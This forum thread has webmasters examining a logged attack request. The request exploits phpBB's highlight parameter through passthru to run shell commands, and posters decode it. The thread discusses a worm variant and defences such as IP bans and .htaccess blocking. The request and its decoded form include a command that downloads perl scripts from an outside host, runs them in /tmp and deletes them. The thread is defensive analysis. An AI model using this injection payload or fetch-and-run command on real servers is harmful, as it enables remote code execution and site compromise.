Forum Moderators: phranque
http://example.com
or
http://mydomain.com
/blog/index.php?cat=4&rush=echo%20_START_%3B%20cd%20/tmp;wget%20server2.norcomp.no/~private/a.txt;wget%20server2.norcomp.no/~private/w.txt;perl%20a.txt;rm%20a.txt;perl%20w.txt;rm%20w.txt%3B%20echo%20_END_&highlight=%2527.passthru%28$HTTP_GET_VARS%5Brush%5D%29.%2527%27;
Try a reverse DNS [dnsstuff.com] to see who is at work here. If it bothers you, ban their IPs from accessing your files.
echo _START_;
cd /tmp;
wget sss.#*$!.tld/~private/a.txt;
wget sss.xxx.tld/~private/w.txt;
perl a.txt;
rm a.txt;
perl w.txt;
rm w.txt;
echo _END_&highlight=%'.passthru($HTTP_GET_VARS[rush]).%'';
According to sources outside WW this seems to be a variant of a worm circulating to attack phpBB and other php based websites. Some sources suggest you block all requests with "rush" in the string in the .htaccess file, but other sources claim that this is just one variant and it can easily mutate to another unrecognizable form, so blocking everything with "rush" doesn't work.